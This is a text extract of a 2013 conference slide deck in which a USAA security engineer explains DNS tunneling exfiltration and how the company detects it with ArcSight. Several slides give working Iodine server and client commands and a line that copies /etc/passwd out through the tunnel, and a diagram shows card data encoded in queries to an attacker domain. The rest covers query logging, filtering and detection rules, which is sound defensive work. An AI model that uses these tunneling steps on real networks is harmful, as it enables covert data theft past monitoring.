© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.

DNS data exfiltration Pete Babcock - USAA

What is DNS Tunneling?

Problem Statement

2

What happened?

The CTOC discovered that DNS tunneling could be used to exfiltrate data from USAA. Last year, in a penetration test, an External Pen Tester hired by USAA confirmed that fact.

What is DNS Tunneling?

USAA CONFIDENTIAL

3

DNS

After hacking the Member’s USAA Account… Normal DNS Traffic (Simplified)

www.google.com

DNS Server Security Monitoring

Firewall

DNS Server

74.125.227.210

USAA CONFIDENTIAL

4

DNS

After hacking the Member’s USAA Account… DNS Tunneling (Greatly Simplified)

yourcre.evilbono.com

DNS Server Security Monitoring

Firewall

“DNS Server”

ditcard.evilbono.com

yourcre ditcard

USAA CONFIDENTIAL

DNS Tunneling

Data Loss Prevention

5

What happened?

The CTOC discovered that DNS tunneling could be used to exfiltrate data from USAA. Last year, in a penetration test, an External Pen Tester hired by USAA confirmed that fact.

What is DNS Tunneling?

How hard is it to detect and prevent?

There are no known commercial products that can easily detect this. Very few companies have home grown solutions. Detection is prone to false positives. There are no known Prevention capabilities. (That don’t break your business…)

USAA CONFIDENTIAL

Tools

DNS Tunneling Testing

6

What tools can be used to facilitate DNS Tunneling?

There are several, but for this demonstration we used Iodine, which is free.

What are the steps to perform DNS tunneling?

1. Start the Virtual Machine that you plan to run the Iodine Server on. a) We used Ubuntu Linux, but there are many options available.

2. Configure external DNS records for owned domain: a) Delegate subdomain NS record to host running Iodine Server

USAA CONFIDENTIAL

Tools

DNS Tunneling Testing

7

3. Port forward udp53 from external IPs to internal VMWare host running Iodine Server.

What tools can be used to facilitate DNS Tunneling?

There are several, but for this demonstration we used Iodine, which is free.

What are the steps to perform DNS tunneling?

1. Start the Virtual Machine that you plan to run the Iodine Server on. a) We used Ubuntu Linux, but there are many options available.

2. Configure external DNS records for owned domain: a) Delegate subdomain NS record to host running Iodine Server

Tools

DNS Tunneling Testing

8

4. Disable any applications currently bound to UDP 53 (like bind) sudo service bind9 stop

3. Port forward udp53 from external IPs to internal VMWare host running Iodine Server.

What tools can be used to facilitate DNS Tunneling?

There are several, but for this demonstration we used Iodine, which is free.

What are the steps to perform DNS tunneling?

1. Start the Virtual Machine that you plan to run the Iodine Server on. a) We used Ubuntu Linux, but there are many options available.

2. Configure external DNS records for owned domain: a) Delegate subdomain NS record to host running Iodine Server

5. Start Iodine Server on virtual machine:) sudo iodined –f –c –P secreUSAA1 192.168.99.1 tunnel.hajda.net

USAA CONFIDENTIAL

Tools

DNS Tunneling Testing

USAA CONFIDENTIAL 9

4. Start iodine client on internal host: sudo iodine –f –P secretUSAA1 tunnel.hajda.net

5. Remote server IP is now 192.168.99.1, copy files through SCP: scp /etc/passwd ctoc@192.168.99.1:/tmp

What are the steps to perform DNS tunneling?

You just sent data through a DNS Tunnel !

And your company probably wouldn’t detect it…

DNS Query Logging and Transmission

USAA Solution

10

How does one monitor for this type of traffic?

Easy. Just turn on query logging for all DNS traffic leaving your company.

An alternative solution utilizing the Load Balancers had to be created and tested. The Load Balancers are strategically placed in front of the DNS solution. Rules on the Load Balancers create load balancer log events for the DNS queries. These events are then streamed via syslog to the ArcSight Connector servers.

Now quickly turn it back off, because you probably just killed your DNS solution...

Most DNS solutions were not designed to log this volume of events long term.

So, how did USAA successfully log all DNS queries leaving the company then?

USAA CONFIDENTIAL

ArcSight Connector – Volume Issues

USAA Solution

11

Doesn’t this place a lot of load then on the ArcSight Connector?

Yes.

An alternative solution utilizing the Load Balancers had to be created and tested. Multiple ArcSight Connectors are created for DNS – Syslog. These Connectors are placed behind Load Balancers. The load balancer has a Virtual IP Address that it load balances for the connectors. The DNS syslog events are distributed amongst the connectors via the load balanced VIP.

How do you scale the ArcSight Connector to handle the load?

USAA CONFIDENTIAL

ArcSight Connector - Parsing

USAA Solution

12

How do you parse the Load Balancer log events?

USAA’s Load Balancers can create the events in the Common Event Format (CEF). The default Syslog Daemon connector will parse these out of the box.

However, USAA wanted to extract specific portions of the destinationHostName field to the destinationDnsDomain field. This necessitated a Flex Connector.

This step could be avoided by doing the parsing in the rule using local variables. USAA chose to perform this step at the connector to save CPU on the Manager.

USAA CONFIDENTIAL

ESM – Volume Issues

USAA Solution

13

So this was the end of the event acquisition issues?

No. The volume of DNS query events quickly began consuming all of the ArcSight ESM ARC_EVENT_DATA free space…

What steps were taken next?

ArcSight ESM Connector filters were then created.

What was filtered?

First, known high volume USAA devices that generate false positives were filtered: ArcSight Connectors Mail Exchangers Proxy Servers

Second, high volume DNS domains that would not be likely to exploit DNS tunneling were filtered.

USAA CONFIDENTIAL

ESM – Rule Filters

USAA Solution

14

DNS events might be useful for other rules. Should you filter all false positive domains out at the Connector Filter level?

This is a subjective thing. There are some domains that USAA chose to filter out at the Rule Filter level instead of the Connector Filter level.

USAA CONFIDENTIAL

ESM – Rule

USAA Solution

15

Now that all of the prep work is done, what does the ESM Rule look like?

At the end of the day, the ESM rule is a variation of the basic “N number of events matching X conditions with M amount of time” Rule

We will look at the rule one tab at a time…

USAA CONFIDENTIAL

USAA Solution

USAA CONFIDENTIAL 16

Give me DNS query events.

Base and Aggregated events. Not Correlation or Action.

Filter ArcSight Connector DNS queries.

Filter Proxy Server DNS queries.

Filter Mail Exchanger DNS queries.

Filter Specific DNS queries: photobucket.com

Filter Specific DNS queries: images at har.com

Filter sources that are VPN user machines.

Rules Filter: Specific Destination Domains

USAA Solution

USAA CONFIDENTIAL 17

N = 40 matches M = 5 Minutes

Where the Host portion of the DNS query has multiple 40 variations

And the Source Address and Destination DNS Domain remain the same.

USAA Solution

USAA CONFIDENTIAL 18

Suppress exact duplicates for a set amount of time.

Include an external USAA Use Case link in the rule fire Meta Event.

And create a “Must Respond” case for the Analyst to work.

ESM – Cases

USAA Solution

19

What do the ESM Cases look like for these rule fires?

Note: The 10.122.x.x IP Address used for these examples is a Test Lab set up for this demonstration and does not reflect USAA’s Production Environment.

USAA CONFIDENTIAL

Data Loss Prevention

USAA CONFIDENTIAL 20

Data Loss Prevention

USAA CONFIDENTIAL 21

Data Loss Prevention

USAA CONFIDENTIAL 22

DNS Tunneling

Results

23

Is this solution in Production?

Yes.

Have we detected any true, malicious DNS Tunneling yet?

No, this sophisticated type of exfiltration was not detected. USAA was hoping that we would not see any DNS Tunneling occurring (other than our tests) and was grateful to be proven correct.

Did this satisfy the requirements to monitor for this activity?

Yes, USAA has satisfied the auditors and our own management.

More importantly, we have increased USAA’s security around Data Loss Prevention!

USAA CONFIDENTIAL

Questions?

Q&A

24 USAA CONFIDENTIAL

© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice.

Security for the new reality